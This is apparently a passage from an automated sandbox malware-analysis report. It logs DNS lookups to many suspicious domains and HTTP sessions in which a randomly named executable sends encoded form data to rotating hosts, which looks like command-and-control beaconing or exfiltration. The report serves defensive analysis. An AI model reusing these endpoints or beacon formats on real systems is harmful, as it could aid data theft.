                                                                                Dec 3, 2024 14:24:39.027950048 CET8050027108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:39.030543089 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:39.042434931 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:39.163765907 CET8050027108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:40.264003038 CET8050027108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:40.321300030 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:45.265116930 CET8050027108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:45.265353918 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:45.268526077 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:45.388633013 CET8050027108.179.253.197192.168.2.5

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 3, 2024 14:21:22.297384977 CET6412653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:21:22.523171902 CET53641261.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:21:27.532414913 CET5405653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:21:27.762589931 CET53540561.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:21:32.781636953 CET6514953192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:21:33.604335070 CET53651491.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:21:50.000390053 CET6044353192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:21:50.500212908 CET53604431.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:22:04.842878103 CET6405553192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:22:05.138133049 CET53640551.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:22:19.595257998 CET5851753192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:22:20.193849087 CET53585171.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:22:34.485311031 CET5633153192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:22:35.286071062 CET53563311.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:22:49.704833031 CET5042853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:22:50.193674088 CET53504281.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:23:05.063889027 CET6392553192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:23:06.007435083 CET53639251.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:23:20.329929113 CET6258153192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:23:20.884874105 CET53625811.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:23:28.955986977 CET6115853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:23:29.283931017 CET53611581.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:23:45.298070908 CET5726053192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:23:45.628345013 CET53572601.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:24:00.188851118 CET5825753192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:24:00.891268015 CET53582571.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:24:15.204896927 CET6486953192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:24:15.651241064 CET53648691.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:24:30.033749104 CET6308153192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:24:30.872323036 CET53630811.1.1.1192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 3, 2024 14:21:22.297384977 CET192.168.2.51.1.1.10x65cbStandard query (0)www.betmatchx.onlineA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:21:27.532414913 CET192.168.2.51.1.1.10xb9cStandard query (0)www.egldfi.xyzA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:21:32.781636953 CET192.168.2.51.1.1.10xc44Standard query (0)www.remedies.proA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:21:50.000390053 CET192.168.2.51.1.1.10x322dStandard query (0)www.egyshare.xyzA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:04.842878103 CET192.168.2.51.1.1.10xcaffStandard query (0)www.appsolucao.shopA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:19.595257998 CET192.168.2.51.1.1.10x6c4cStandard query (0)www.samundri.onlineA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:34.485311031 CET192.168.2.51.1.1.10x9cb2Standard query (0)www.happyjam.lifeA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:49.704833031 CET192.168.2.51.1.1.10xf812Standard query (0)www.t19yd.topA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:05.063889027 CET192.168.2.51.1.1.10xe9a0Standard query (0)www.atendefacil.infoA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:20.329929113 CET192.168.2.51.1.1.10x11feStandard query (0)www.uynline.shopA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:28.955986977 CET192.168.2.51.1.1.10x8f76Standard query (0)www.sitioseguro.blogA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:45.298070908 CET192.168.2.51.1.1.10xa376Standard query (0)www.dating-apps-az-dn5.xyzA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:24:00.188851118 CET192.168.2.51.1.1.10x77e6Standard query (0)www.whisperart.netA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:24:15.204896927 CET192.168.2.51.1.1.10xca92Standard query (0)www.ana-silverco.shopA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:24:30.033749104 CET192.168.2.51.1.1.10xe307Standard query (0)www.bloodbalancecaps.shopA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 3, 2024 14:21:22.523171902 CET1.1.1.1192.168.2.50x65cbName error (3)www.betmatchx.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:21:27.762589931 CET1.1.1.1192.168.2.50xb9cName error (3)www.egldfi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:21:33.604335070 CET1.1.1.1192.168.2.50xc44No error (0)www.remedies.pro13.248.169.48A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:21:33.604335070 CET1.1.1.1192.168.2.50xc44No error (0)www.remedies.pro76.223.54.146A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:21:50.500212908 CET1.1.1.1192.168.2.50x322dNo error (0)www.egyshare.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:21:50.500212908 CET1.1.1.1192.168.2.50x322dNo error (0)www.egyshare.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:05.138133049 CET1.1.1.1192.168.2.50xcaffNo error (0)www.appsolucao.shopappsolucao.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:05.138133049 CET1.1.1.1192.168.2.50xcaffNo error (0)appsolucao.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:20.193849087 CET1.1.1.1192.168.2.50x6c4cNo error (0)www.samundri.onlinesamundri.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:20.193849087 CET1.1.1.1192.168.2.50x6c4cNo error (0)samundri.online84.32.84.32A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:35.286071062 CET1.1.1.1192.168.2.50x9cb2No error (0)www.happyjam.life209.74.77.107A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:50.193674088 CET1.1.1.1192.168.2.50xf812No error (0)www.t19yd.topt19yd.topCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:22:50.193674088 CET1.1.1.1192.168.2.50xf812No error (0)t19yd.top38.47.207.164A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:06.007435083 CET1.1.1.1192.168.2.50xe9a0No error (0)www.atendefacil.info208.115.225.220A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:20.884874105 CET1.1.1.1192.168.2.50x11feNo error (0)www.uynline.shopuynline.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:29.283931017 CET1.1.1.1192.168.2.50x8f76No error (0)www.sitioseguro.blog104.21.15.100A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:29.283931017 CET1.1.1.1192.168.2.50x8f76No error (0)www.sitioseguro.blog172.67.162.39A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:23:45.628345013 CET1.1.1.1192.168.2.50xa376No error (0)www.dating-apps-az-dn5.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:24:00.891268015 CET1.1.1.1192.168.2.50x77e6No error (0)www.whisperart.net199.59.243.227A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:24:15.651241064 CET1.1.1.1192.168.2.50xca92No error (0)www.ana-silverco.shop172.67.156.195A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:24:15.651241064 CET1.1.1.1192.168.2.50xca92No error (0)www.ana-silverco.shop104.21.90.137A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:24:30.872323036 CET1.1.1.1192.168.2.50xe307No error (0)www.bloodbalancecaps.shopbloodbalancecaps.shopCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:24:30.872323036 CET1.1.1.1192.168.2.50xe307No error (0)bloodbalancecaps.shop108.179.253.197A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.remedies.pro
                                                                                • www.egyshare.xyz
                                                                                • www.appsolucao.shop
                                                                                • www.samundri.online
                                                                                • www.happyjam.life
                                                                                • www.t19yd.top
                                                                                • www.atendefacil.info
                                                                                • www.sitioseguro.blog
                                                                                • www.dating-apps-az-dn5.xyz
                                                                                • www.whisperart.net
                                                                                • www.ana-silverco.shop
                                                                                • www.bloodbalancecaps.shop

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.54979613.248.169.48801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:21:33.868537903 CET524OUTGET /8ewn/?fh=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblIvsB4LfBbF1oBXzvh2mLP4bfiHovBjqCi6jVggqxg==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.remedies.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:21:34.946650982 CET410INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 03 Dec 2024 13:21:34 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 270
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 68 3d 4d 51 55 38 68 67 71 4a 43 66 4a 6b 4b 77 75 72 71 35 51 58 53 54 63 73 41 53 63 55 48 77 33 52 79 75 79 39 49 32 39 65 77 79 72 46 48 4c 4a 69 4f 35 45 55 4a 63 38 64 68 6a 4c 68 6b 50 31 77 2b 6b 4d 46 69 4b 58 31 4a 66 39 6e 69 33 6a 4b 74 31 57 47 2f 5a 70 62 6c 49 76 73 42 34 4c 66 42 62 46 31 6f 42 58 7a 76 68 32 6d 4c 50 34 62 66 69 48 6f 76 42 6a 71 43 69 36 6a 56 67 67 71 78 67 3d 3d 26 6a 6e 47 6c 59 3d 64 48 65 58 77 48 31 50 6b 4a 5a 44 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fh=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblIvsB4LfBbF1oBXzvh2mLP4bfiHovBjqCi6jVggqxg==&jnGlY=dHeXwH1PkJZDr"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.54983313.248.169.48801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:21:50.638335943 CET777OUTPOST /440l/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.egyshare.xyz
                                                                                Origin: http://www.egyshare.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.egyshare.xyz/440l/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 49 4a 5a 47 53 48 64 42 7a 55 76 70 79 43 4e 67 6c 59 4f 65 53 48 45 37 73 71 4a 42 62 6d 70 67 42 33 32 50 78 6b 6a 48 4c 57 6b 33 4f 62 72 45 66 4f 54 2f 41 2b 65 77 50 30 46 47 65 4e 48 72 6d 2b 49 71 2b 56 66 48 5a 76 74 36 37 54 36 57 39 73 39 72 69 50 6c 38 6d 56 63 34 46 52 4d 35 62 4d 5a 4d 39 5a 4a 58 39 6c 6d 4c 73 41 73 33 47 74 70 31 48 33 50 30 31 6e 44 2b 34 63 38 62 68 69 42 72 6e 34 38 55 6a 70 6f 65 66 55 5a 34 42 65 49 62 71 2f 63 68 48 7a 6c 77 6e 38 65 31 78 76 4a 59 68 4c 69 47 72 79 49 39 68 47 39 59 4d 6c 43 48 45 4d 73 4c 35 51 59 3d
                                                                                Data Ascii: fh=wvRL/7AjjEcZIJZGSHdBzUvpyCNglYOeSHE7sqJBbmpgB32PxkjHLWk3ObrEfOT/A+ewP0FGeNHrm+Iq+VfHZvt67T6W9s9riPl8mVc4FRM5bMZM9ZJX9lmLsAs3Gtp1H3P01nD+4c8bhiBrn48UjpoefUZ4BeIbq/chHzlwn8e1xvJYhLiGryI9hG9YMlCHEMsL5QY=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.54983913.248.169.48801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:21:53.309835911 CET797OUTPOST /440l/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.egyshare.xyz
                                                                                Origin: http://www.egyshare.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.egyshare.xyz/440l/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 4f 70 70 47 56 6b 46 42 36 55 76 6f 75 53 4e 67 76 34 50 58 53 48 49 37 73 75 5a 52 62 51 35 67 42 55 69 50 79 6c 6a 48 4d 57 6b 33 47 37 72 4e 51 75 54 4b 41 2b 69 65 50 78 39 47 65 4e 37 72 6d 2f 34 71 2b 6c 6a 41 59 2f 74 38 39 54 36 55 69 38 39 72 69 50 6c 38 6d 56 49 43 46 52 45 35 61 38 4a 4d 73 49 4a 55 78 46 6d 49 72 41 73 33 43 74 70 75 48 33 50 53 31 6c 37 45 34 66 45 62 68 6a 78 72 6e 74 49 58 71 70 6f 45 43 45 5a 6f 53 4d 4a 31 6c 50 6f 7a 4c 56 51 49 33 64 2b 74 30 5a 34 79 37 70 71 75 34 53 6b 46 78 56 31 76 64 56 6a 75 65 76 38 37 6e 48 50 64 70 79 57 39 38 46 65 76 5a 68 59 76 67 41 66 4e 61 6c 44 6e
                                                                                Data Ascii: fh=wvRL/7AjjEcZOppGVkFB6UvouSNgv4PXSHI7suZRbQ5gBUiPyljHMWk3G7rNQuTKA+iePx9GeN7rm/4q+ljAY/t89T6Ui89riPl8mVICFRE5a8JMsIJUxFmIrAs3CtpuH3PS1l7E4fEbhjxrntIXqpoECEZoSMJ1lPozLVQI3d+t0Z4y7pqu4SkFxV1vdVjuev87nHPdpyW98FevZhYvgAfNalDn


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.54984913.248.169.48801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:21:55.980192900 CET1814OUTPOST /440l/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.egyshare.xyz
                                                                                Origin: http://www.egyshare.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.egyshare.xyz/440l/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 4f 70 70 47 56 6b 46 42 36 55 76 6f 75 53 4e 67 76 34 50 58 53 48 49 37 73 75 5a 52 62 51 78 67 42 6b 2b 50 79 47 4c 48 4e 57 6b 33 61 72 72 49 51 75 54 54 41 2b 4b 61 50 78 68 34 65 49 33 72 6d 5a 45 71 34 57 37 41 53 2f 74 38 78 7a 36 4a 39 73 39 45 69 50 31 67 6d 56 59 43 46 52 45 35 61 36 46 4d 38 70 4a 55 7a 46 6d 4c 73 41 73 7a 47 74 6f 67 48 30 2f 73 31 6a 6e 75 34 76 6b 62 69 44 68 72 6b 62 6b 58 6f 4a 6f 43 42 45 59 33 53 4d 46 32 6c 50 45 2f 4c 52 51 75 33 61 4b 74 32 73 68 59 6b 4c 32 68 6e 52 59 45 38 69 70 51 63 6c 6a 38 42 63 55 4b 74 41 6e 2f 70 79 53 66 36 41 4b 56 59 42 59 6a 30 6b 4c 6a 49 41 44 6d 63 4f 56 70 49 70 48 33 30 44 57 62 41 73 2b 69 61 69 66 58 54 6c 61 5a 6c 52 41 6e 41 72 44 53 72 52 50 77 37 70 56 6e 65 6d 69 38 46 7a 43 62 5a 50 6e 38 4b 4e 76 56 36 75 41 37 30 41 43 50 4b 35 34 62 68 30 62 2f 38 51 78 66 65 58 70 44 75 7a 33 77 50 77 36 33 53 43 2b 32 62 79 56 71 6a 53 4e 54 4d 4d 59 6c 2f 6a 2f 6f 51 51 4c 61 4f 79 2b [TRUNCATED]
                                                                                Data Ascii: fh=wvRL/7AjjEcZOppGVkFB6UvouSNgv4PXSHI7suZRbQxgBk+PyGLHNWk3arrIQuTTA+KaPxh4eI3rmZEq4W7AS/t8xz6J9s9EiP1gmVYCFRE5a6FM8pJUzFmLsAszGtogH0/s1jnu4vkbiDhrkbkXoJoCBEY3SMF2lPE/LRQu3aKt2shYkL2hnRYE8ipQclj8BcUKtAn/pySf6AKVYBYj0kLjIADmcOVpIpH30DWbAs+iaifXTlaZlRAnArDSrRPw7pVnemi8FzCbZPn8KNvV6uA70ACPK54bh0b/8QxfeXpDuz3wPw63SC+2byVqjSNTMMYl/j/oQQLaOy+MPj6lhF4RCvGLgAHJbEnMXnj1DLg4mqYOIgb0TFGwB6S6lErPEVDdkg2uWh/6E2IHFfOcy5P8Ry6ZqyYM5GaKgar4r+AIuqOVXqq1G1OGRgWG7Lr2DFxiiQMPEWel+jiVKW7k/mXbPqJb93bmCcm5nHg/GP4/Y0zznoTopkAaL+f1ckWakpZOMC0sdT2Dr+HmFKWvBlNBGnHzsBz9xsM8BLGVKANsPwJ5Ts02lH72vKVBUjpeE8FMytK2R6oEClR/u3WPCyp+6SaBVYZ5nvCoe3edFwGGaaW6Q8uSSA5ZjYG/gjSQAamJPeQJMlgl1P2SX5jJNQl4FzGUl/Ne+59NQkCZ/MhCPQlv1vXSMYarl64LXGBGDyCJRrwarsSQJbVvDS7wPXBBa7xE088XeBo557aGxuMtI1bIl1pQUBqoOLtK6VBXGN04KOiA+9GWcE84D8BtohnpsTq7V+qsjaiEXxMde/TfDa+QV7n1FUjAi0ME3G0YY/tHpD7dLlkjyjDRIf75siBagQwnngceUyr8L0XkJhNEl8OijS/7x3AkBr8novNebOqfkcE8B7Zg0W0LkQ889S3GVhK9dkSy7Akc+zKIGilt2AyMJc8i2UKSsaNxz9f6HiS6t8IUlWJ/Tglq68u7T0QeEYOWd/WWdyrJ4JPLFYHWeQ3sN [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.54985513.248.169.48801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:21:58.647058010 CET524OUTGET /440l/?fh=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5zmz57pelvxK6DYsSAIhb49b75Fyr268iC5rfP5+VA==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.egyshare.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:21:59.785680056 CET410INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 03 Dec 2024 13:21:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 270
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 68 3d 39 74 35 72 38 50 74 73 74 42 55 47 66 71 70 49 65 68 35 58 6e 45 69 73 77 44 39 6c 75 4d 69 45 65 56 73 61 6a 74 77 37 5a 33 64 71 44 6b 47 42 38 6d 4c 47 43 68 59 39 43 71 66 4b 45 61 48 79 45 76 4b 4a 44 7a 41 4e 59 59 58 4a 6d 4f 38 58 68 30 4b 31 53 66 4a 44 35 7a 6d 7a 35 37 70 65 6c 76 78 4b 36 44 59 73 53 41 49 68 62 34 39 62 37 35 46 79 72 32 36 38 69 43 35 72 66 50 35 2b 56 41 3d 3d 26 6a 6e 47 6c 59 3d 64 48 65 58 77 48 31 50 6b 4a 5a 44 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fh=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5zmz57pelvxK6DYsSAIhb49b75Fyr268iC5rfP5+VA==&jnGlY=dHeXwH1PkJZDr"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.54987184.32.84.32801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:05.276699066 CET786OUTPOST /8mlm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Origin: http://www.appsolucao.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.appsolucao.shop/8mlm/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 4f 71 47 65 65 44 47 36 74 74 6b 4e 49 59 73 6d 56 43 59 65 4b 45 4d 4f 43 77 38 55 70 4d 66 4e 6f 4d 4a 62 39 75 2f 34 7a 4c 2b 6a 47 33 61 56 34 76 6b 6c 4d 56 50 79 78 46 70 68 7a 66 46 50 50 2f 68 65 47 4a 77 75 51 70 6c 6f 45 5a 65 63 65 71 56 68 55 31 78 43 2b 77 62 4b 41 63 36 33 4e 51 6e 4a 4c 50 72 58 56 75 55 5a 34 6d 75 6d 77 44 4e 77 59 53 7a 44 36 79 74 61 58 6d 32 58 33 2b 5a 48 6e 56 46 33 74 76 77 2b 4f 53 4d 38 59 2b 67 55 38 49 55 67 34 48 31 73 46 4d 38 37 4c 6e 39 41 6a 2b 4a 79 44 38 79 76 45 6b 45 34 6d 71 79 6e 76 75 62 46 41 7a 6c 6f 53 6b 37 2f 45 4a 43 70 42 51 4d 3d
                                                                                Data Ascii: fh=OqGeeDG6ttkNIYsmVCYeKEMOCw8UpMfNoMJb9u/4zL+jG3aV4vklMVPyxFphzfFPP/heGJwuQploEZeceqVhU1xC+wbKAc63NQnJLPrXVuUZ4mumwDNwYSzD6ytaXm2X3+ZHnVF3tvw+OSM8Y+gU8IUg4H1sFM87Ln9Aj+JyD8yvEkE4mqynvubFAzloSk7/EJCpBQM=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.54987784.32.84.32801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:07.950037956 CET806OUTPOST /8mlm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Origin: http://www.appsolucao.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.appsolucao.shop/8mlm/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
